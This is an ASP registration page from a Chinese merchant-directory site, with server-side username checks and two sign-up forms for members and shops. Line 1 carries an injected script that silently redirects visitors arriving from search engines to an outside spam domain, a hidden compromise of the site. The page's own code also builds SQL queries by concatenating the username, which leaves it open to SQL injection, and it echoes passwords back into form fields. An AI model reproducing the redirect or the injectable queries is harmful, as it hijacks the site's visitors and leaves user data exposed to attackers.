d:\wwwroot\wuchunhua\kqiqi_reg_check_520.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/conn.asp"-->
002: <!--#include file="inc/kqiqi_sub.asp"-->
003: <!--#include file="inc/kqiqi_fuction.asp"-->
004: <!--#include file="inc/function.asp"-->
005: <!--#include file="inc/Checkyuckj.asp"-->
006: <%
007: dim k,per,password1
008: per=Request.form("per")
009: username=HtmlEncode(Request.form("username"))
010: if nothaveChinese(username)=false then
011: response.write "<script language=JavaScript>" & chr(13) & "alert('用户名不能是中文!');" & "history.back()" & "</script>"
012: response.end
013: end if
014: password=Request.form("password")
015: password1=Request.form("password1")
016: set rs=server.createobject("adodb.recordset")
017: 'if per="1" then
018: 'sql="select username from [user] where username='"&username&"' "
019: 'else
020: 'sql="select username from [kqiqi_shop] where username='"&username&"' "
021: 'end if
022: 'rs.open sql,conn,1,1
023: 'if not rs.eof or not rs.bof then
024: 'if trim(rs("username"))=username then
025: 'response.write "<script language=JavaScript>" & chr(13) & "alert('您输入的用户名已经注册过,请重新注册');" & "history.back()" & "</script>"
026: 'response.end
027: 'end if
028: 'end if
029: 'rs.close
030: 'set rs=nothing
031:
032: sql="select username from [user] where username='"&username&"' "
033: rs.open sql,conn,1,1
034: if not rs.eof or not rs.bof then
035: response.write "<script language=JavaScript>" & chr(13) & "alert('您输入的用户名已经注册过,请重新注册.');" & "history.back()" & "</script>"
036: response.end
037: end if
038: rs.close
039: set rs=nothing
040:
041: set rs=server.createobject("adodb.recordset")
042: sql="select username from [kqiqi_shop] where username='"&username&"' "
043: rs.open sql,conn,1,1
044: if not rs.eof or not rs.bof then
045: response.write "<script language=JavaScript>" & chr(13) & "alert('您输入的用户名已经注册过,请重新注册.');" & "history.back()" & "</script>"
046: response.end
047: end if
048: rs.close
049: set rs=nothing
050:
051:
052: if UserName="" then
053: response.write"<script language=JavaScript>" & chr(13) & "alert('用户名不能为空!');" & "history.back()" & "</script>"
054: response.end
055: end if
056: if Password="" then
057: response.write"<script language=JavaScript>" & chr(13) & "alert('密码不能为空!');" & "history.back()" & "</script>"
058: response.end
059: end if
060:
061: %
>
062: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
063: <html xmlns="http://www.w3.org/1999/xhtml">
064: <head>
065: <title><%=title%>-注册会员-第二步</title>
066: <meta http-equiv="Content-Language" content="zh-cn">
067: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
068: <link rel="icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
069: <link rel="shortcut icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
070: <link href="inc/style.css" rel="stylesheet" type="text/css" />
071: <script>
072: function loadThreadFollow(t_id,b_id){
073:    var targetImg =eval("document.all.followImg" + t_id);
074:    var targetDiv =eval("document.all.follow" + t_id);
075:   
076:    if ("object"==typeof(targetImg)){
077:       if (targetDiv.style.display!='block'){
078:          targetDiv.style.display="block";
079:         
080:       }else{
081:          targetDiv.style.display="none";
082:       }
083:    }
084: }
085: </script>
086: </head>
087: <body>
088: <div id="Fmain">
089: <div id="header">
090: <%call top()%>
091: </div>
092: <div class=kon></div>
093: <div id=FFTit class=F12bold><a href="/">首页</a>→<a href="/">会员注册第二步</a></div><div id=FFContent><div Class='FFdiv'>
094:
095: <%if per="1" then%> <SCRIPT language=javascript>
096: <!--
097: function CheckForm()
098: {
099: if(document.thisForm.username.value.length<1)
100:    {
101:        alert("登陆帐号没有填写!");
102:        document.thisForm.username.focus();
103:        return false;
104:    }
105:     var filter=/^\s*[.A-Za-z0-9_-]{5,18}\s*$/;
106:         if (!filter.test(document.thisForm.username.value)) {
107:                 alert("用户名填写不正确,请重新填写!可使用的字符为(A-Z a-z 0-9 _ - .)长度不小于5个字符,不超过18个字符,注意不要使用空格。");
108:                 document.thisForm.username.focus();
109:                 document.thisForm.username.select();
110:                 return (false);
111:                 }
112: if(document.thisForm.password.value.length<6)
113:    {
114:        alert("密码没有填写正确,请在6位数以上!");
115:        document.thisForm.password.focus();
116:        return false;
117:    }
118: if (document.thisForm.yuckjanswer.value.length == 0) {
119:       alert("请您填写防恶意注册问题答案!");
120:       document.thisForm.yuckjanswer.focus();
121:       return false;
122:    }
123:
124: if (document.thisForm.name.value.length == 0) {
125:       alert("请您填写真实姓名!");
126:       document.thisForm.name.focus();
127:       return false;
128:    }
129:    var str="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./'[]{}`1234567890-=\~!@#$%^&*()_+|?><:";
130:    var errorChar
131:    errorChar = isCharsInBag(thisForm.name.value,str)
132:    if (errorChar != "" )
133:    {
134:       alert('真实姓名必须是中文!');
135:       thisForm.name.focus();
136:       return false;
137:    }
138: function isCharsInBag (s, bag)
139: {
140: var i,c;
141: for (i = 0; i < s.length; i++)
142: {
143: c = s.charAt(i);//字符串s中的字符
144: if (bag.indexOf(c) > -1)
145: return c;
146: }
147: return "";
148: }
149:
150: if(document.thisForm.name.value.length<2||document.thisForm.name.value.length>4)
151:    {
152:        alert("真实姓名不能少于2字多于4字!");
153:         document.thisForm.name.focus();
154:         document.thisForm.name.select();
155:        return false;
156:    }
157: if(document.thisForm.dianhua.value.length<7)
158:    {
159:        alert("请填写您的联系电话,不能小于七位!");
160:        document.thisForm.dianhua.focus();
161:        return false;
162:    }
163: if(document.thisForm.email.value.length<1)
164:    {
165:        alert("电子邮箱没有填写!");
166:        document.thisForm.email.focus();
167:        return false;
168:    }
169:         var filter=/^\s*([A-Za-z0-9_-]+(\.\w+)*@(\w+\.)+\w{2,3})\s*$/;
170:         if (!filter.test(document.thisForm.email.value)) {
171:                 alert("邮件地址不正确,请重新填写!");
172:                 document.thisForm.email.focus();
173:                 document.thisForm.email.select();
174:                 return (false);
175:                 }  
176: if(document.thisForm.dizhi.value.length<2)
177:    {
178:        alert("请填写您的通信地址,不能小于二位!");
179:        document.thisForm.dizhi.focus();
180:        return false;
181:    }
182: if (document.thisForm.kqiqi_checkcode.value.length == 0)
183:    {
184:        alert ("请输入您的验证码!");
185:        document.thisForm.kqiqi_checkcode.focus();  
186:        return(false);
187:     }
188:
189: }
190:
191: //-->

192: </SCRIPT><form method="POST" name="thisForm" action="kqiqi_regcheck_save.asp">
193: <table width="705">
194: <tr>
195: <td height="26" align="right" width="143"><p><font color="#FF0000">&nbsp;</font></td>
196: <td height="26" align="right" width="200"></td>
197: <td width="352"><b>注意:带<font color="#FF0000"> *</font>为必填项!</b></td>
198: </tr>
199: <tr>
200: <td height="26" align="right" width="143"><p><font color="#FF0000">&nbsp;</font></td>
201: <td height="26" align="right" width="200">登陆帐号:</td>
202: <td width="352"><input type="text" maxlength="18" name="username" size="20" value="<%=username%>"><font color="#FF0000"> *</font></td>
203: </tr>
204:
205: <tr>
206: <td height="156" align="right" width="143" rowspan="10"><p> <p> <p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <p>&nbsp;&nbsp;&nbsp; </td>
207: <td height="26" align="right" width="200">帐号密码:</td>
208: <td width="352"><input type="password" maxlength="40" name="password" size="20" value="<%=password%>" ><font color="#FF0000"> *</font></td>
209: </tr>
210: <tr>
211: <td height="26" align="right" width="200"></td>
212: <td width="352"><font color="#FF0000">为了防恶意注册,请回答以下问题:</font>
213:    <%
214:    Randomize
215: Session("yuckjID")=int(Rnd*QuesionNum)
216: %
>
217: </td>
218: </tr>
219: <tr>
220: <td height="26" align="right" width="200">问题:</td>
221: <td width="352">
222: <%
223: response.write""&QuesionArray(Session("yuckjID"))&""
224: %
>
225: </td>
226: </tr>
227: <tr>
228: <td height="26" align="right" width="200">答案:</td>
229: <td width="352"><INPUT type="text" size=20 name=yuckjanswer><font color="#FF0000"> *</font></td>
230: </tr>
231:
232: <tr>
233: <td height="26" align="right" width="200">真实姓名:</td>
234: <td width="352"><input type="text" maxlength="12" name="name" size="20"><font color="#FF0000"> *</font>&nbsp;&nbsp;中文(2-4字)</td>
235: </tr>
236: <tr>
237: <td height="26" align="right" width="200">联系电话:</td>
238: <td width="352"><input type="text" maxlength="20" name="dianhua" size="24" ><font color="#FF0000"> *</font>&nbsp;&nbsp; (7位以上)
239: </td>
240: </tr>
241: <tr>
242: <td height="26" align="right" width="200">QQ:</td><td width="352"><input type="text" maxlength="50" name="qq1" size="27" ></td>
243: </tr>
244: <tr>
245: <td height="26" align="right" width="200">Email:</td><td width="352"><input type="text" maxlength="255" name="email" size="24" ><font color="#FF0000"> *</font></td>
246: </tr>
247: <tr>
248: <td height="26" align="right" width="200">通信地址: </td><td width="352"><input type="text" maxlength="50" name="dizhi" size="32" ><font color="#FF0000"> *</font></td>
249: </tr>
250: <tr>
251: <td height="26" align="right" width="200">验证码:</td><td width="352"><input name="kqiqi_checkcode"  type="text"  id="kqiqi_checkcode" maxlength="4" size="11">
252: <IMG src=getcode.asp alt="验证码,看不清楚请点击刷新验证码" title="看不清请点击刷新验证码" style="cursor:pointer;height:20px;" onClick="this.src='getcode.asp?rand='+Math.random()">点击可刷新验证码
253: </td>
254: </tr>
255: <tr><td height="30" width="143"><p align="center"><input type="hidden" name="per" value="kqiqi"></td><td height="30" width="200"> </td>
256: <td height="30" width="352"><input type="submit" onclick="javascript:return CheckForm();" value="确认注册" name="tijiao1"></td></tr>
257: </table></form><%else%> <SCRIPT language=javascript>
258: <!--
259: function CheckForm()
260: {
261: if(document.comForm1.comusername.value.length<1)
262:    {
263:        alert("登陆帐号没有填写!");
264:        return false;
265:    }
266:     var filter=/^\s*[.A-Za-z0-9_-]{5,18}\s*$/;
267:         if (!filter.test(document.comForm1.comusername.value)) {
268:                 alert("用户名填写不正确,请重新填写!可使用的字符为(A-Z a-z 0-9 _ - .)长度不小于5个字符,不超过18个字符,注意不要使用空格。");
269:                 document.comForm1.comusername.focus();
270:                 document.comForm1.comusername.select();
271:                 return (false);
272:                 }
273: if(document.comForm1.compassword.value.length<6)
274:    {
275:        alert("密码没有填写正确或小于6位!");
276:        document.comForm1.compassword.focus();
277:        return false;
278:    }
279: if(document.comForm1.compassword1.value.length<6)
280:    {
281:        alert("确认密码没有填写正确或小于6位!");
282:        document.comForm1.compassword1.focus();
283:        return false;
284:    }
285:       if (document.comForm1.compassword.value!=document.comForm1.compassword1.value ){
286:               alert("两次填写的密码不一致,请重新填写!");
287:                 document.comForm1.compassword.focus();
288:                 document.comForm1.compassword.select();
289:                 return (false);
290:                 }
291: if (document.comForm1.yuckjanswer.value.length == 0) {
292:       alert("请您填写防恶意注册问题答案!");
293:       document.comForm1.yuckjanswer.focus();
294:       return false;
295:    }
296:
297: if(document.comForm1.sjcla1.value.length<1)
298:    {
299:        alert("所属行业一级分类不能为空!");
300:        document.comForm1.sjcla1.focus();
301:        return (false);
302:    }
303: if(document.comForm1.sjcla2.value.length<1)
304:    {
305:        alert("所属行业二级分类不能为空!");
306:        document.comForm1.sjcla2.focus();
307:        return (false);
308:    }
309: if(document.comForm1.sjcla1.value=="一级分类")
310:    {
311:        alert("请您选择所属行业一级分类!");
312:         document.comForm1.sjcla1.focus();
313:         return false;
314:    }
315: if(document.comForm1.sjcla2.value=="二级分类")
316:    {
317:        alert("请您选择所属行业一级分类带出二级分类!");
318:         document.comForm1.sjcla2.focus();
319:         return false;
320:    }
321:
322: if(document.comForm1.com.value.length<3)
323:    {
324:        alert("公司/商店名称没有填写或少于3个字!");
325:         document.comForm1.com.focus();
326:         document.comForm1.com.select();
327:        return false;
328:    }
329: if(document.comForm1.comabout.value.length<5)
330:    {
331:        alert("公司/商店简介没有填写或少于5个字!");
332:         document.comForm1.comabout.focus();
333:         document.comForm1.comabout.select();
334:        return false;
335:    }
336: if (document.comForm1.comname.value.length == 0) {
337:       alert("请您填写商家姓名!");
338:       document.comForm1.comname.focus();
339:       return false;
340:    }
341:    var str="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./'[]{}`1234567890-=\~!@#$%^&*()_+|?><:";
342:    var errorChar
343:    errorChar = isCharsInBag(comForm1.comname.value,str)
344:    if (errorChar != "" )
345:    {
346:       alert('商家姓名必须是中文!');
347:       comForm1.comname.focus();
348:       return false;
349:    }
350: function isCharsInBag (s, bag)
351: {
352: var i,c;
353: for (i = 0; i < s.length; i++)
354: {
355: c = s.charAt(i);//字符串s中的字符
356: if (bag.indexOf(c) > -1)
357: return c;
358: }
359: return "";
360: }
361:
362: if(document.comForm1.comname.value.length<2||document.comForm1.comname.value.length>4)
363:    {
364:        alert("商家姓名不能少于2字多于4字!");
365:         document.comForm1.comname.focus();
366:         document.comForm1.comname.select();
367:        return false;
368:    }
369:
370: if(document.comForm1.comdianhua.value.length<7)
371:    {
372:        alert("请填写您的联系电话,不能少于7位数!");
373:        document.comForm1.comdianhua.focus();
374:        return false;
375:    }
376: if(document.comForm1.comemail.value.length<1)
377:    {
378:        alert("电子邮箱没有填写!");
379:        document.comForm1.comemail.focus();
380:        return false;
381:    }
382:         var filter=/^\s*([A-Za-z0-9_-]+(\.\w+)*@(\w+\.)+\w{2,3})\s*$/;
383:         if (!filter.test(document.comForm1.comemail.value)) {
384:                 alert("邮件地址不正确,请重新填写!");
385:                 document.comForm1.comemail.focus();
386:                 document.comForm1.comemail.select();
387:                 return (false);
388:                 }  
389:        if(document.comForm1.mb.value=="选择模板风格")
390:    {
391:        alert("请您选择模板风格,为您打造风格店铺!");
392:         document.comForm1.mb.focus();
393:         return false;
394:    }
395:
396: if(document.comForm1.comdizhi.value.length<2)
397:    {
398:        alert("商家地址没有填写!");
399:        document.comForm1.comdizhi.focus();
400:        return false;
401:    }
402: if (document.comForm1.kqiqi_checkcode.value.length == 0)
403:    {
404:        alert ("请输入您的验证码!");
405:        document.comForm1.kqiqi_checkcode.focus();  
406:        return(false);
407:     }
408:
409: }
410:
411: //-->

412: </SCRIPT>
413: <form method="POST" name="comForm1" action="kqiqi_regcheck_save.asp"><table width="705"><tr><td height="425" align="center" width="143" rowspan="23"></td><td height="25" align="right" width="199"></td>
414: <td height="25" width="354"><b>注意:带<font color="#FF0000"> *</font>为必填项!</b></td>
415: </tr>
416: <tr><td height="25" align="right" width="199">登陆帐号:</td><td height="25" width="354"><input type="text" maxlength="18" name="comusername" size="20" value="<%=username%>"></td></tr>
417: <tr><td height="25" align="right" width="199">帐号密码:</td><td height="25" width="354"><input type="password" maxlength="40" name="compassword" size="20" value="<%=password%>" ></td></tr>
418: <tr><td height="25" align="right" width="199">确认密码:</td><td height="25" width="354"><input type="password" maxlength="40" name="compassword1" size="20" value="<%=password%>" ></td></tr>
419: <tr><td height="25" align="right" width="199"></td><td height="25" width="354">
420:    <font color="#FF0000">为了防恶意注册,请回答以下问题:</font>
421:    <%
422:    Randomize
423: Session("yuckjID")=int(Rnd*QuesionNum)
424: %
>
425: </td></tr>
426: <tr><td height="25" align="right" width="199">问题:</td><td height="25" width="354">
427: <%
428: response.write""&QuesionArray(Session("yuckjID"))&""
429: %
></td></tr>
430: <tr><td height="25" align="right" width="199">答案:</td><td height="25" width="354"><INPUT type="text" size=30 name=yuckjanswer> <font color="#FF0000" value>*</font> </td></tr>
431: <tr><td height="25" align="right" width="199">所属行业:</td><td height="25" width="354"><%
432: dim rsclass,sqlclass
433: username=request.cookies("kqiqi")("username")
434: set rsclass=server.createobject("adodb.recordset")
435: sqlclass = "select * from sjcla2 order by paixu desc"
436: rsclass.open sqlclass,conn,1,1
437: %
><SCRIPT language = "JavaScript">
438: var onecount;
439: onecount=0;
440: subcat = new Array();
441:         <%
442:         count = 0
443:         do while not rsclass.eof
444:         %
>
445: subcat[<%=count%>] = new Array("<%=rsclass("sjcla2")%>","<%= trim(rsclass("sjcla1"))%>","<%= trim(rsclass("id"))%>");
446:         <%
447:         count = count + 1
448:         rsclass.movenext
449:         loop
450:         rsclass.close
451:         %
>
452: onecount=<%=count%>;
453:
454: function changelocation(locationid)
455:     {
456:     document.comForm1.sjcla2.length = 0;
457:
458:     var locationid=locationid;
459:     var i;
460:     for (i=0;i < onecount; i++)
461:         {
462:             if (subcat[i][1] == locationid)
463:             {
464:                 document.comForm1.sjcla2.options[document.comForm1.sjcla2.length] = new Option(subcat[i][0], subcat[i][2]);
465:             }        
466:         }
467:         
468:     }    
469: </SCRIPT><%
470: sqlclass = "select * from sjcla1 order by paixu desc"
471: rsclass.open sqlclass,conn,1,1
472: if rsclass.eof and rsclass.bof then
473: response.write "请先添加栏目。"
474: response.end
475: else
476: %
><SELECT name="sjcla1" onChange="changelocation(document.comForm1.sjcla1.options[document.comForm1.sjcla1.selectedIndex].value)" size="1"><OPTION selected value="一级分类">一级分类</OPTION><%do while not rsclass.eof
477: %
><OPTION value="<%=trim(rsclass("id"))%>"><%=trim(left(rsclass("sjcla1"),4))%></OPTION><%
478: rsclass.movenext
479: loop
480: end if
481: rsclass.close
482: %
></SELECT><SELECT name="sjcla2"><OPTION selected value="二级分类">二级分类</OPTION></SELECT> <font color="#FF0000" value>*</font>  </td></tr><tr><td height="25" align="right" width="199">城市区域:</td><td height="25" width="354"><%if diqu1="1" then call dix() else call dix1()end if%></td></tr>
483: <tr><td height="25" align="right" width="199">商家/店铺名称:</td><td height="25" width="354"><input type="text" maxlength="20" name="com" size="38"> <font color="#FF0000" value>*</font> </td></tr><tr><td height="25" align="right" width="199">商家/店铺简介:</td><td height="25" width="354">
484:    <textarea rows="6" name="comabout" cols="31"></textarea> <font color="#FF0000" value>*</font> 1000字内</td></tr>
485:    <tr><td height="25" align="right" width="199">商家姓名:</td><td height="25" width="354"><input type="text" maxlength="12" name="comname" size="20"> <font color="#FF0000" value>*</font>&nbsp;&nbsp;中文(2-4字)</td></tr>
486:    <tr><td height="25" align="right" width="199">联系电话:</td><td height="25" width="354"><input type="text" maxlength="20" name="comdianhua" size="20" > <font color="#FF0000" value>*</font>&nbsp;&nbsp;(7位以上)</td></tr>
487:    <tr><td height="25" align="right" width="199">传真:</td><td height="25" width="354"><input type="text" maxlength="20" name="comfax" size="20" > </td></tr>
488:    <tr><td height="25" align="right" width="199">QQ/MSN:</td><td height="25" width="354"><input type="text" maxlength="30" name="qq" size="20" ></td></tr>
489:    <tr><td height="25" align="right" width="199">E-mail:</td><td height="25" width="354"><input type="text" maxlength="30" name="comemail" size="20" > <font color="#FF0000" value>*</font> </td></tr>
490:    <tr>
491: <td height="25" align="right" width="199">店铺模板风格:</td><td height="25" width="354"><select name="mb" size="1">
492: <OPTION value="选择模板风格" selected>选择模板风格</OPTION>
493:           <OPTION value="1">橙色梦想店铺</OPTION>
494:           <OPTION value="2">绿色沙丘店铺</OPTION>
495:           <OPTION value="3">粉红佳人店铺</OPTION>
496:           </select><font color="#FF0000" value>*</font>
497: </td>
498: </tr>
499:
500:    <tr><td height="25" align="right" width="199">网址:</td><td height="25" width="354"><input type="text" maxlength="50" name="url" size="38" value="http://" ></td></tr>
501:    <tr><td height="25" align="right" width="199">商家地址:</td><td height="25" width="354"><input type="text" maxlength="50" name="comdizhi" size="38" ><font color="#FF0000" value>*</font></td></tr>
502:    <tr><td height="25" align="right" width="199">交通指向:</td><td height="25" width="354"><input type="text" maxlength="100" name="che" size="38" ></td></tr>
503:    <tr><td height="25" align="right" width="199">(大小:150*150)店标:</td><td height="25" width="354"><input type="text" name="tupian" size="38" id="tupian" maxlength="200"><span id="followImg1" style="CURSOR: hand" title="选中上传店标图片" onclick="loadThreadFollow(1,5)"><font color="#FF0000">上传图片</font>↓</span></td></tr>
504:    <tr style="display:none" id="follow1"><td height="25" align="center" width="199">上传不成功请检查是否在规格内</td><td height="25" width="354"><iframe name="I1" frameborder="0" width="99%" height="30" scrolling="no" src="upshoplogo.asp"></iframe></td></tr>
505:    <tr>
506: <td height="26" align="right" width="200">验证码:</td><td width="352"><input name="kqiqi_checkcode"  type="text"  id="kqiqi_checkcode" maxlength="4" size="11">
507: <IMG src=getcode.asp alt="验证码,看不清楚请点击刷新验证码" title="看不清请点击刷新验证码" style="cursor:pointer;height:20px;" onClick="this.src='getcode.asp?rand='+Math.random()">点击可刷新验证码
508: </td>
509: </tr>
510:    <tr><td height="40" width="143"></td><td height="30" width="200"> </td>
511: <td height="40" width="354"><input type="submit" onclick="javascript:return CheckForm();" value="确认注册" name="tijiao"></td></tr>
512:    </table></form><%end if%>
513:       </div></div>
514:    <br style="clear:both;" />
515: <div class=kon></div>
516: <div class=kon></div>
517: <div id="footer">
518:
519: <%call bottom()%>
520: </div>
521: </div>
522: </body>
523: </html>
524:
525: